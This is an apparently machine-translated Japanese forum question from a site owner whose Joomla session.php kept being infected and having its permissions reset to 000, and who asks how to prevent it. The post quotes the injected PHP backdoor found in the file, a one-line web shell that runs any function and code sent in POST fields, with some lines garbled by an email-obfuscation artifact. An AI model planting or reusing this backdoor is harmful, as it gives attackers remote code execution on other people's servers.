-1
私たちのウェブサイトの1つは、エラーログを確認した後、毎日エラー500を出していました。私は/ home/cadactdi/public_html/joomla/session/session.phpはそれ自身で000に変更されました。Joomla:session.phpのパーミッションがウイルスのために000に変更されました
ユーティリティポート80を調べると、セッションファイルが何らかの種類のウイルスに感染していることがわかりましたが、その方法の詳細はありませんでした。
更新プログラムはオプションではないため、毎日自分で権限を変更していましたが、翌日には再び000に戻りました。
私はセッションファイルを読み、私は、ファイルの先頭に次のコードを見つけました:
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"][email protected]_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"][email protected]_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"][email protected]_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"][email protected]_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
だから私はそれらの行を削除し、ウイルススキャナは、任意の脅威にこの時間を見つけられませんでした、と私はそれが修正されているとは思いますが、ウイルスがそのファイルを変更する可能性がある場合や、それを防ぐ方法があるかどうかはわかりません。
誰にも同じ問題がありましたか?推奨事項は何ですか?
ありがとうございました!
ありがとうございました!私はそれをチェックしている –